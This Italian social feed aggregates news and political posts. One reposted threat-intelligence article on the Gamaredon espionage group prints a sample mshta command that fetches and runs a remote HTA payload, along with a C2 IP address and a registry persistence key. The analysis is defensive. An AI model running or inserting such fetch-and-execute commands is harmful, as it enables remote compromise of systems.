Salta al contenuto principale



PALESTINA. Artisti chiedono pace, giustizia e libertà


@Notizie dall'Italia e dal mondo
"Viva Viva Palestina" è una rete di artisti che nasce a Genova e che ha come finalità la diffusione e la divulgazione della cultura e dell’arte della Palestina. Insieme a Defence for Children International Italia, il 16 dicembre organizzeranno un grande evento a scopo benefico
L'articolo PALESTINA. Artisti



L’UE perde 5 miliardi di euro di tasse digitali all’anno, secondo uno studio del Centro per le politiche europee

L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
Il capitalismo digitale rischia di lasciare l’Europa indietro. È quanto emerge da uno studio condotto



The Math Behind the Music of the 80s


27896996

Although there might have been other music produced or recorded in the 1980s, we may never know of its existence due to the cacophony of all of the various keytars, drum machines, and other synthesized music playing nonstop throughout the decade. There was perhaps no more responsible synthesizer than the Yamaha DX7 either; it nearly single-handedly ushered in the synth pop era. There had been other ways of producing similar sounds before but none were as unique as this keyboard, and for ways beyond just its sound as [Kevin] describes in this write-up.

Part of the reason the DX7 was so revolutionary was that it was among the first accessible synthesizers that was fully digital, meaning could play more than one note at a time since expensive analog circuitry didn’t need to be replicated for multiple keys. But it also generated its tones by using frequency modulation of sine waves in a way that allowed many signals to be combined to form different sounds. While most popular musicians of the 80s used one of the preset sounds of the synthesizer, it could produce an incredible range of diverse sounds if the musician was willing to dig a bit into the programming of this unique instrument.

There were of course other reasons this synthesizer took off. It was incredibly robust, allowing a musician to reliably carry it from show to show without much worry, and it also stood on the shoulders of giants since musicians had been experimenting with various other types of synthesizers for the previous few decades. And perhaps it was at the right place and time for the culture as well. For a look at the goings on inside the chip that powered the device, [Ken Shirriff] did a deep dive into one a few years ago.


hackaday.com/2024/12/11/the-ma…



Criminalizzare il dissenso, la protesta e la disobbedienza rendendoli reato rappresenta uno dei più gravi attacchi ai diritti fondamentali, ad uno dei pilastri della democrazia: il diritto di manifestare e dissentire. Il ddl cosiddetto sicurezza non vuole mettere al sicuro i cittadini, ma chi detiene il potere per metterlo al riparo da ogni tipo di [...]


Contrasto internazionale alla «dark fleet»: c'è chi suggerisce di impiegare Carabinieri e Guardia di Finanza per combattere gli armatori che aiutano la Russia ad eludere le sanzioni


##

Immagine/foto

La «dark fleet» (letteralmente Flotta Oscura) è una rete di navi e armatori che aiuta la Russia a eludere le sanzioni occidentali trasportando petrolio e altri beni, ponendo una sfida all’applicazione del regime delle sanzioni (maritime-professionals.com/the…).

Recentemente un rapporto del think thank Usa Atlantic Council esalta le forze di polizia italiane, che hanno le competenze più indicate al mondo per smascherare gli armatori ombra. Il rapporto (atlanticcouncil.org/in-depth-r…) suggerisce che i governi occidentali dovrebbero sfruttare forze investigative come i Carabinieri italiani e la Guardia di Finanza per scoprire le vere strutture proprietarie di queste navi.
Una volta individuate, misure come negare il visto ai proprietari e alle loro famiglie dovrebbero essere utilizzate come deterrente.

Immagine/foto

Il coinvolgimento di Carabinieri e la Guardia di Finanza italiani viene presentato come una potenziale soluzione per i governi occidentali che cercano di affrontare questo problema.

Ad esempio l’UE sta valutando un nuovo pacchetto di sanzioni che consentirebbe agli Stati membri del Mar Baltico di ispezionare il carico e i documenti delle navi, comprese le petroliere, nelle loro acque.
Il Regno Unito ha iniziato a richiedere dati assicurativi alle navi che transitano lungo la sua costa meridionale.
Viene inoltre suggerito che un’agenzia europea dedicata istituisca un sistema di tracciamento per la flotta oscura.
Altra misura potrebbe essere fare pressione sui registri delle “bandiere di comodo”.

Immagine/foto

Il rapporto rileva che, dietro le quinte, i governi occidentali hanno cercato di fare pressione su alcuni stati affinché si astenessero dal registrare le navi della «flotta oscura», ma questi sforzi non hanno avuto successo.
Il rapporto chiede quindi un maggiore impegno da parte degli stati costieri per contrastare queste “bandiere di comodo” utilizzate dalla «flotta oscura».
Oltre il 20% delle navi della «flotta oscura» si sono rifiutate di utilizzare i piloti durante l’attraversamento dello stretto danese, il che è visto come un modo per evitare controlli.
Incoraggiare l'utilizzo dei piloti invocando i principi di "buona condotta marittima" viene suggerito come potenziale deterrente.
L’obiettivo generale è aumentare la trasparenza ed il monitoraggio della «flotta oscura» per ostacolare la sua capacità di aiutare la Russia a eludere le sanzioni.


Il rapporto avverte inoltre che, man mano che la flotta oscura continua a operare e a crescere, emergerà un settore marittimo alternativo che minaccia non solo le singole navi e gli stati costieri, ma il funzionamento dell’ordine marittimo globale.

@Politica interna, europea e internazionale



Il gran finale di Microsoft per il 2024: 1 Zero-Day, 71 CVE e una corsa contro il tempo


Con il Patch Tuesday di dicembre, Microsoft chiude il 2024 con un’ultima serie di aggiornamenti di sicurezza, portando il totale del mese a 71 CVE (Common Vulnerabilities and Exposures). Questo mese segna la terza più ridotta distribuzione di patch dell’anno, preceduta solo da gennaio e giugno. Tuttavia, la dimensione ridotta non significa che manchino criticità: tra le vulnerabilità risolte, figura un pericoloso zero-day già sfruttato attivamente, CVE-2024-49138.

La Vulnerabilità CVE-2024-49138


Questa vulnerabilità di elevazione dei privilegi colpisce il sistema Windows Common Log File System e consente agli attaccanti di ottenere privilegi SYSTEM, il che significa accesso completo al sistema bersaglio. Non sorprende che Microsoft abbia posto un accento particolare su questa falla, considerando che è già oggetto di attacchi attivi e riguarda ogni versione supportata di Windows e Windows Server. L’applicazione immediata delle patch è cruciale per prevenire potenziali compromissioni, mentre Microsoft ha fornito poche informazioni tecniche, se non per sottolineare la gravità del problema.

Oltre allo Zero-Day, tra le 16 vulnerabilità classificate come “critiche”, spicca CVE-2024-49112, una falla di esecuzione di codice remoto nel protocollo Windows Lightweight Directory Access Protocol (LDAP). Con un punteggio di gravità di 9.8 su 10, è questione di tempo prima che venga sfruttata attivamente.

Per chi non può aggiornare immediatamente, Microsoft ha fornito mitigazioni temporanee:

  • Configura i controller di dominio per bloccare l’accesso a Internet.
  • Impedisci l’accesso RPC in ingresso da reti non fidate.

Queste misure non solo proteggono contro CVE-2024-49112, ma rappresentano buone pratiche di sicurezza generale, come sottolineato da Tyler Reguly, direttore associato di Security R&D presso Fortra. “Microsoft ha fornito mitigazioni che sono fondamentalmente norme di buona gestione informatica, ma servono come promemoria importante per le imprese,” ha dichiarato Reguly.

Il protocollo Windows Remote Desktop Services continua a essere un bersaglio privilegiato per gli attaccanti, con 9 delle vulnerabilità critiche di questo mese che riguardano l’esecuzione di codice remoto in questa componente. Questo evidenzia quanto sia essenziale per le aziende adottare configurazioni sicure e applicare immediatamente gli aggiornamenti forniti.

Altre vulnerabilità rilevanti includono falle critiche in componenti chiave come LSASS, Hyper-V e Microsoft Message Queuing (MSMQ), tutte potenziali vettori per attacchi devastanti se non affrontate tempestivamente.

Conclusione


Microsoft chiude il sipario del 2024 con un ultimo Zero-Day e un pacchetto di patch che richiede attenzione immediata. Agire con rapidità è essenziale per proteggere i sistemi e prepararsi al futuro di un panorama di minacce in continua evoluzione.

Nel 2025, la parola d’ordine sarà prevenzione: applicare tempestivamente le patch oggi rappresenta l’investimento più efficace per evitare interruzioni critiche e vulnerabilità costose in futuro.

L'articolo Il gran finale di Microsoft per il 2024: 1 Zero-Day, 71 CVE e una corsa contro il tempo proviene da il blog della sicurezza informatica.



Oggi, 11 dicembre, 80 anni fa


Gianni Morandi

Nasce a Monghidoro (Bologna) Gianni Morandi.
Da giovane lavora come venditore di bibite nel cinema della sua città, ma anche come aiutante del padre nel negozio di calzolaio.
Diverrà uno dei più famosi cantanti italiani, anche all'estero, nonché attore e presentatore televisivo.

#GianniMorandi
@Storia

youtu.be/3_vXL8UeDk4?feature=s…



Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi


Europol denuncia l’arresto di otto membri di un gruppo internazionale di criminalità informatica che ha rubato milioni di euro alle sue vittime. Gli indagati hanno affittato immobili e appartamenti di lusso tramite Airbnb e vi hanno creato call center fraudolenti.

I membri del gruppo sono stati arrestati in Belgio e nei Paesi Bassi all’inizio di dicembre 2024. È stato inoltre riferito che contemporaneamente in due paesi sono state effettuate 17 perquisizioni, durante le quali la polizia ha sequestrato supporti di memorizzazione, telefoni e vari oggetti di lusso, che presumibilmente sarebbero stati acquistati con i proventi di crimini informatici.
27885015
La polizia olandese riferisce dell’arresto di tre uomini e una donna, di età compresa tra 23 e 66 anni. I sospettati sono accusati di phishing, frode online, frode bancaria, riciclaggio di denaro e coinvolgimento in attività criminali informatiche.

Secondo le forze dell’ordine, il gruppo ha condotto le sue campagne di phishing da call center temporanei che i truffatori hanno allestito in appartamenti di lusso affittati tramite Airbnb.

I truffatori hanno contattato le vittime dei paesi europei tramite e-mail, SMS o messaggi WhatsApp e si sono spacciati per impiegati di banca o funzionari delle forze dell’ordine che presumibilmente lavorano per combattere le frodi. Hanno scritto e chiamato le vittime, sostenendo che i loro conti erano stati compromessi e invitando le persone a cliccare rapidamente sui collegamenti ai siti di phishing che imitavano le banche reali.

Se un utente si innamorava dei truffatori (e il bersaglio degli aggressori erano spesso persone anziane) e immetteva i propri dati personali su queste pagine dannose, queste finivano nelle mani degli aggressori, che svuotavano rapidamente gli account della vittima.

Allo stesso tempo, secondo gli investigatori, gli aggressori hanno speso i fondi rubati in un modo molto insolito: acquistando viaggi costosi, abiti firmati, orologi premium, auto di lusso e organizzando feste in club chiusi.

Le forze dell’ordine hanno botato che i sospettati non hanno nemmeno cercato di nascondersi e hanno apertamente dimostrato uno stile di vita lussuoso sui social network, pubblicando regolarmente immagini di beni costosi e foto con celebrità.

L'articolo Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi proviene da il blog della sicurezza informatica.



APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio


Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.

Tecniche di Attacco e Vettori di Infezione


La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.
27882942
L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.

1. File LNK Maligni


APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.

Esempio di Comando LNK:
mshta http://malicious-domain/payload.hta

2. File XHTML Malevoli


Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.

Tecnica di Download Dinamico:

3. Campagne di Spear-Phishing


APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.

Strumenti e Malware Impiegati

1. Pteranodon


Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.

Funzionalità principali:

  • Esecuzione di comandi remoti
  • Esfiltrazione di file sensibili
  • Persistenza tramite chiavi di registro


2. LitterDrifter


Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.

Meccanismo di Diffusione:

  • Copia del file VBS nelle unità rimovibili
  • Creazione di file LNK dannosi nella root dell’unità USB
  • Esecuzione automatica tramite modifiche al file autorun.inf


3. GammaLoad e GammaSteel


Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.

Tecniche di Persistenza e Obfuscation


APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:

  1. Modifiche al Registro di Sistema:
    • Esecuzione automatica dei payload malevoli tramite chiavi di registro:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


  2. Obfuscation degli Script:
    • Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.


  3. Infettare Dispositivi Rimovibili:
    • Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.



Infrastruttura di Comando e Controllo (C2)


L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:

  • Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
  • Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.

Esempio di IP associato: 5.181.189.32

Settori Colpiti


I settori principali presi di mira da APT-C-53 includono:

  • Governo
  • Difesa
  • Diplomazia
  • Media
  • Attivisti e ONG

APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:

  • Filtri avanzati per email e allegati
  • Monitoraggio delle modifiche al registro di sistema
  • Segmentazione della rete e restrizioni sui dispositivi USB
  • Aggiornamenti costanti dei sistemi di rilevamento delle minacce

Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.

L'articolo APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio proviene da il blog della sicurezza informatica.



From Felt to Fate: Building Your Own Sorting Hat


[Wills] and his purple DIY sorting hat

Ever wondered how it feels to have the Sorting Hat decide your fate? [Will Dana] wanted to find out, so he conjured a bit of Hogwarts magic, and crafted a fully animatronic Sorting Hat from scratch. In the video below, he covers every step of bringing this magical purple marvel to life—from rapid joystick movements to the electronics behind it all.

The heart of the project is two 9g servos—one actuates the mouth, and the other controls the eyebrows—powered by an ESP32 microcontroller. Communication between two ESP32 boards ensures smooth operation via the ESP-NOW protocol, making this a wireless wonder. The design process involved using mechanical advantage to solve jittery servo movements, a trick that will resonate with anyone who’s fought with uncooperative motors.

If animatronics or themed projects excite you, Hackaday has covered similar builds, from a DIY BB-8 droid to a robot fox.

youtube.com/embed/I_xfRrZDjNA?…


hackaday.com/2024/12/10/from-f…



#tentapes è un hub per la #musica #elettronica (#techno e non). In un mondo sempre più legato a tendenze e cliché fortemente codificati, tentapes mira a riportare la libertà di espressione e l'arte al centro della musica da club, potenziandone la creatività.

tentapes BUFFET ep. 1 - RVRSRVR Live
peertube.uno/w/msn4it7AaGcAuf1…

djpanini reshared this.



Il servizio del Tg3, andato oggi in onda nelle edizioni delle 14,20, ha confermato quanto ho denunciato immediatamente. In un impianto ENI inserito nella Direttiva Seveso III a effettuare le operazioni di carico delle autobotti non sono lavoratori specializzati con contratto dei chimici ma gli stessi camionisti. Per questo sono morti loro. Su questa gravissima circostanza presenterò un esposto all’autorità giudiziaria nelle prossime ore.

Gli autotrasportatori sono stati ammazzati da un sistema che scarica su di loro le operazioni di carico ad alto rischio.

A Calenzano, come ovunque in Italia, anche negli impianti Eni, si è risparmiato sui costi del personale per il carico facendo fare direttamente ai camionisti un lavoro per il quale non hanno quasi sempre una formazione specifica né tanto meno opportuna copertura assicurativa. Questo sistema, che coinvolge anche una grande società come Eni, crea una situazione di altissimo rischio considerato che così si gestiscono quasi ovunque in Italia materiali infiammabili e tossici

Si tratta di una cosa che in Germania, in Francia e gran parte d’Europa non accade: in altri paesi l’autotrasportatore consegna il mezzo agli operatori e ci risale sopra dopo che il personale ha concluso le operazioni. Per assicurarsi i contratti le ditte di trasporti accettano di farsi carico di queste operazioni e così fanno anche i padroncini che, essendo cottimisti e subordinati, sono di fatto l’anello debole della catena dei subappalti, costretti a lavorare perennemente nella fretta.
È molto grave che ENI non abbia ancora fornito informazioni al riguardo. Le autorità competenti dovrebbero appurare immediatamente se queste sono le circostanze della strage. Non accetto che si parli di errore umano perché, se quanto mi riferiscono camionisti è vero, degli onesti lavoratori sono morti a causa di un sistema che fa profitti sulla loro pelle. Siamo di fronte a omicidi bianchi di cui portano la responsabilità non solo l’ENI e tutte le autorità che avrebbero dovuto garantire la sicurezza. Ci rendiamo conto che questo sistema operava in un sito ad altissima pericolosità e che l’esplosione estendendosi a tutto l’impianto avrebbe potuto provocare un disastro ancor più devastante? Credo che l’autorità giudiziaria dovrebbe verificare se quanto ho appreso corrisponda al vero e inviterei le procure a estendere i controlli a tutta Italia. Non è tollerabile che in impianti che rientrano nella direttiva Seveso, o comunque ad alta pericolosità, si consentano operazioni di carico senza personale specializzato. Mi dicono che in qualche caso il personale ci sarebbe ma si tratterebbe non di lavoratori inquadrati nel contratto dei chimici ma di cooperative sociali.
La situazione che denuncio dicono che sia normale ma non lo è se Oltralpe accade il contrario. Il fatto che in questa condizione si trovano quotidianamente gli autotrasportatori italiani rende l’idea di quale sia il rispetto per le condizioni di sicurezza di chi lavora nel nostro paese. Approfittando di una normativa non chiara per quanto riguarda le competenze di caricatori e trasportatori le imprese si sono scaricate i costi relativi alla gestione di questa situazione di rischio.
Ai familiari delle vittime e dei dispersi la solidarietà del Partito della Rifondazione Comunista.

Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista

Maronno Winchester reshared this.





L'app ufficiale di PeerTube è ora disponibile:

@Che succede nel Fediverso?

All'app mancano molte funzionalità, ma non è colpa degli sviluppatori

framablog.org/2024/12/10/peert…

Il post di @Fedi.Tips 🎄
⬇️


Official PeerTube app out now:

:android: play.google.com/store/apps/det…

:apple_old_logo: apps.apple.com/app/peertube/id…

(coming soon to F-Droid)

How to add more servers:

1. Click Explore
2. Click "Show More Platforms"
3. Click the + icon in top right
4. Enter server's web address & connect
5. Click "Platforms" at the bottom to browse added servers

App is missing a lot of features, but it is not the developers' fault (framablog.org/2024/12/10/peert…). See reply below for how to get these features.

🧵 1/2


reshared this



#Blueshittification - Bluesky stuzzica l'attenzione con l'abbonamento a pagamento, Bluesky+, in un nuovo mockup

La startup di social network e concorrente X Bluesky sta lavorando sugli abbonamenti. La società ha annunciato per la prima volta i piani per sviluppare un nuovo flusso di entrate basato sul modello di abbonamento quando ha descritto in dettaglio la sua Serie A da 15 milioni di dollari a ottobre. Ora, i mockup che stuzzicano l'imminente abbonamento a Bluesky, insieme a un elenco di possibili funzionalità, sono stati pubblicati su GitHub di #Bluesky .

techcrunch.com/2024/12/09/blue…

@Informatica (Italy e non Italy 😁)



Anduril raddoppia sull’underwater. Dopo Ghost Shark, ecco Dive Xl

@Notizie dall'Italia e dal mondo

L’attenzione da parte dei governi verso le capacità unmanned destinate ad operare nel dominio dell’underwater è in costante crescita. E alcune aziende l’hanno capito. Una di queste è Anduril Industries, che ha recentemente avviato test di resistenza per il suo nuovo sottomarino autonomo



Pornhub's Year in Review report for 2024 reveals a search for something very mindful, and very demure.

Pornhubx27;s Year in Review report for 2024 reveals a search for something very mindful, and very demure.#pornhub #AIPorn



NCC e Foglio di servizio elettronico: dal punto di vista della protezione dei dati personali.


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/ncc-fdse…
I rastrellamenti e le deportazioni accadute durante la vigenza delle leggi razziali erano perfettamente legali perchè previste dalla legge. Aiutare e nascondere Anne Frank per salvarla dalla camera a gas è stato un




Fog Data Science is a location tracking company that takes data harvested from smartphones and makes it accessible to cops. A document obtained by 404 Media shows the company explicitly says it will use doctors visits to unmask a target if needed.#News #Privacy


Posso oggi confermare quanto ho scritto ieri nel mio precedente comunicato.

Gli autotrasportatori sono stati ammazzati da un sistema che scarica su di loro le operazioni di carico ad alto rischio.
In un impianto ENI inserito nella Direttiva Seveso a effettuare le operazioni di carico delle autobotti non sono lavoratori specializzati con contratto dei chimici ma i camionisti. Per questo sono morti loro.
A Calenzano, come ovunque in Italia, anche negli impianti Eni, si è risparmiato sui costi del personale per il carico facendo fare direttamente ai camionisti un lavoro per il quale non hanno quasi sempre una formazione specifica né tanto meno opportuna copertura assicurativa. Questo sistema, che coinvolge anche una grande società come Eni, crea una situazione di altissimo rischio considerato che così si gestiscono quasi ovunque in Italia materiali infiammabili e tossici

Si tratta di una cosa che in Germania, in Francia e gran parte d’Europa non accade: in altri paesi l’autotrasportatore consegna il mezzo agli operatori e ci risale sopra dopo che il personale ha concluso le operazioni. Per assicurarsi i contratti le ditte di trasporti accettano di farsi carico di queste operazioni e così fanno anche i padroncini che, essendo cottimisti e subordinati, sono di fatto l’anello debole della catena dei subappalti, costretti a lavorare perennemente nella fretta.
È molto grave che ENI non abbia ancora fornito informazioni al riguardo. Le autorità competenti dovrebbero appurare immediatamente se queste sono le circostanze della strage. Non accetto che si parli di errore umano perché, se quanto mi riferiscono camionisti è vero, degli onesti lavoratori sono morti a causa di un sistema che fa profitti sulla loro pelle. Siamo di fronte a omicidi bianchi di cui portano la responsabilità non solo l’ENI e tutte le autorità che avrebbero dovuto garantire la sicurezza. Ci rendiamo conto che questo sistema operava in un sito ad altissima pericolosità e che l’esplosione estendendosi a tutto l’impianto avrebbe potuto provocare un disastro ancor più devastante? Credo che l’autorità giudiziaria dovrebbe verificare se quanto ho appreso corrisponda al vero e inviterei le procure a estendere i controlli a tutta Italia. Non è tollerabile che in impianti che rientrano nella direttiva Seveso, o comunque ad alta pericolosità, si consentano operazioni di carico senza personale specializzato. Mi dicono che in qualche caso il personale ci sarebbe ma si tratterebbe non di lavoratori inquadrati nel contratto dei chimici ma di cooperative sociali.
La situazione che denuncio dicono che sia normale ma non lo è se Oltralpe accade il contrario. Il fatto che in questa condizione si trovano quotidianamente gli autotrasportatori italiani rende l’idea di quale sia il rispetto per le condizioni di sicurezza di chi lavora nel nostro paese. Approfittando di una normativa non chiara per quanto riguarda le competenze di caricatori e trasportatori le imprese si sono scaricate i costi relativi alla gestione di questa situazione di rischio.
Ai familiari delle vittime e dei dispersi la solidarietà del Partito della Rifondazione Comunista.

Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista



Oggi, 10 dicembre 2024 è la giornata internazionale dei Diritti Umani. Difatti, il 10 dicembre del 1948, al termine di due conflitti mondiali, venne adottata dall’Assemblea delle Nazioni Unite la Dichiarazione dei Diritti Universali dell’Uomo come va…

G. Gibson reshared this.



Non erano passate neanche 48 ore dalla fine dal regime di Assad e Italia, Austria, Germania e Regno Unito, già avevano deciso di sospendere le richieste di asilo. Ora che gli jihadisti di Al Qaeda hanno preso Damasco la Siria sarebbe diventata un paese sicuro dove si rispettano i diritti umani? Le milizie jihadiste finanziate da Turchia, Usa, petromonarchie e chissà quanti alleati del cd “mondo libero” oggi parlano di liberazione, ma quale è il futuro che attende la popolazione siriana in tutte le sue complesse componenti? Non lo sappiamo, nessuno può saperlo, ma intanto, col cinismo tipico delle post democrazie europee, si è deciso di sospendere le richieste d’asilo per uomini e donne che dalla Siria sono fuggiti. Questo dopo che, dal 2016, l’UE ha regalato miliardi di euro al regime di Erdogan, per trasformare la Turchia in un carcere a cielo aperto per siriani e non solo, tentando di fermare chi cercava scampo nei Paesi dell’Unione. Facciamo presente che oggi la Siria è nella stessa situazione della Libia nel 2011 con distruzioni ancor maggiori e la presenza di diverse milizie di fondamentalisti, nonché di truppe straniere provenienti da vari paesi. Nel nord è in atto l’attacco di jihadisti e turchi contro i curdi. La scelta dei governi europei di sospendere diritto di asilo è un atto di sciacallaggio vero e proprio che distrugge ogni vincolo del diritto internazionale, che dimostra, per l’ennesima volta, come le guerre costituiscano il paradigma strutturale di questa Europa, capace di armare chi fa comodo e contemporaneamente di distruggere chi lotta per la sopravvivenza. Che nessuno si azzardi a costringere, chi non lo vuole, a tornare in quei luoghi che dal 2011 sono macellerie in cui diversi carnefici si sono avvicendati. Chi propone tale scelta è da considerarsi complice della distruzione del diritto d’asilo e di crimini contro l’umanità. Perchè tutta questa fretta?

Maurizio Acerbo, segretario nazionale
Stefano Galieni, responsabile nazionale immigrazione PRC-S.E

reshared this



Antonello Patta*

Andrea Ilari**

La vicenda dei precari del Cnr può essere assunta per tante regioni a metafora di un paese il cui futuro è messo in crisi da politiche che sprecano risorse e competenze pubbliche straordinarie mentre distruggono la vita delle persone.
Nel CNR ci sono 4000 precari della ricerca giovani e meno giovani, assegnisti e tempi determinati. Questi uomini e queste donne si sono laureati e molti di loro (quelli che lavorano nella ricerca) hanno conseguito il dottorato. Sono tutti formati per lavorare nel campo della ricerca e sviluppo. Poiché i governi italiani in modo miope investono poco nella ricerca molti di loro vanno a lavorare all’estero. Un sondaggio informale promosso dal Ministero degli affari esteri e della cooperazione internazionale nel 2021 tra le diverse Sedi diplomatiche italiane ha contato circa 33mila ricercatori italiani all’estero. Il gruppo più grande è quello degli Stati Uniti, dove è stimato lavorino più di 15.000 scienziati italiani. Quindi con i soldi delle nostre tasse formiamo giovani ricercatori che poi saranno accolti da altri paesi dove le condizioni di lavoro sono senz’altro migliori.
Parte dei soldi del PNRR, una piccolissima parte sono stati spesi in ricerca e sviluppo e sono stati assunti molti ricercatori a tempo determinato con la promessa di una futura stabilizzazione, ma alle promesse come spesso accade non ha fatto seguito nessuna azione concreta. Non solo; la bozza della legge di bilancio prevede un blocco del 25 % del turn over e un aumento dell’età pensionabile che ridurrebbero ulteriormente le possibilità di impiego dei lavoratori del CNR. È in risposta a tutto ciò che ha ripreso vita il movimento precari uniti del CNR che ha cominciato a mettere in atto delle azioni di protesta.
Il 28 novembre 2024 le OO.SS. FLC CGIL e Federazione UIL Scuola RUA, insieme al movimento dei Precari Uniti, hanno indetto un’assemblea nazionale dei precari del CNR. L’evento ha registrato una partecipazione così straordinaria , sia precari che strutturati, provenienti da tutta Italia, che l’incontro, è stato spostato in uno spazio più grande dove si sono visti anche numerosi esponenti politici e rappresentanti degli organi di stampa.
Dietro questa grande spinta dal basso FLC CGIL e Federazione UIL Scuola RUA hanno rinnovato con forza la richiesta alla Presidente di avviare una ricognizione puntuale dei lavoratori precari in possesso dei requisiti previsti dalla normativa Madia (Dlgs 75/2017) per dare seguito al processo di stabilizzazione. Cosa possibile solo con un cambio di rotta rispetto alle previsioni contenute nella prossima Legge di Bilancio, che taglia fondi e personale.
La Presidente, dopo un breve e iniziale incontro avvenuto nell’atrio del CNR con le OO.SS. e una rappresentanza dei lavoratori precari, ha dichiarato che l’Ente, al momento, non intende procedere con le stabilizzazioni.
Questa posizione, ritenuta insufficiente e inaccettabile dall’assemblea, ha portato alla decisione di proseguire la mobilitazione, proclamando un’assemblea permanente presso il CNR. L’obiettivo è ottenere risposte chiare e concrete, sia dalla Presidente sia dal Governo, per porre fine alla condizione di precarietà che mina la dignità dei lavoratori del CNR.
Con questi obiettivi la lotta, con il presidio sulla scalinata della sede centrale del CNR, continua, forte della solidarietà delle lavoratrici e lavoratori a tempo indeterminato della CGIL e della UIL e del sostegno manifestato dal segretario della CGIL Maurizio Landini e dalla segretaria dell’FLC CGIL Gianna Fracassi
Come Prc sosteniamo questa lotta che rappresenta un esempio importante per i milioni di lavoratrici e lavoratori assunte/i con contratti precari, bassi salari e scarse tutele; sono ben 3 milioni in Italia, 500 mila nel pubblico, gli occupati a termine impiegati in tutti i settori pubblici e privati e considerati oramai come un fenomeno fisiologico nonostante le scarse tutele e i bassi salari con retribuzioni medie intorno ai 10 mila euro.

Numeri che fanno ben capire l’importanza della costruzione di un fronte di lotta di tutto il vario mondo dellle lavoratrici e dei lavoratori precari, un passaggio decisivo per la riunificazione di tutto il mondo del lavoro contro questo governo che continua a portare avanti le politiche neoliberiste che hanno frantumato la classe in lavoratori di serie A e di serie B per ridurre salari e diritti di tutte e tutti.

*responsabile nazionale lavoro del Prc
*Primo ricercatore del CNR, Direttivo FLC-CGIL Rieti-Roma Est -Valle dell’Aniene



BRASILE. Il presidente Lula operato per emorragia cerebrale


@Notizie dall'Italia e dal mondo
La risonanza magnetica, effettuata a causa di un forte mal di testa, ha rivelato un versamento di sangue, probabilmente causato da una caduta
L'articolo BRASILE. Il presidente pagineesteri.it/2024/12/10/ame…



Le principali sfide della Siria post-Assad


@Notizie dall'Italia e dal mondo
Il futuro del nuovo modello siriano dipenderà dall'equilibrio di potere tra le varie fazioni e dal loro impegno per evitare un ritorno alla guerra
L'articolo Le principali sfide della Siria post-Assad proviene da Pagine Esteri.



UCRAINA. La Brigata Marina San Marco addestra in Italia le truppe di Kiev


@Notizie dall'Italia e dal mondo
In Puglia le unità anfibie d’élite delle forze armate ucraine. L’Intendenza della Marina Militare di Brindisi ha affidato a una società cooperativa piemontese i servizi di interpretariato e traduzione in lingua ucraina da svolgersi per un periodo di cinque anni



Il governo Meloni (come mezza Europa) sospende le richieste di asilo dei siriani


@Politica interna, europea e internazionale
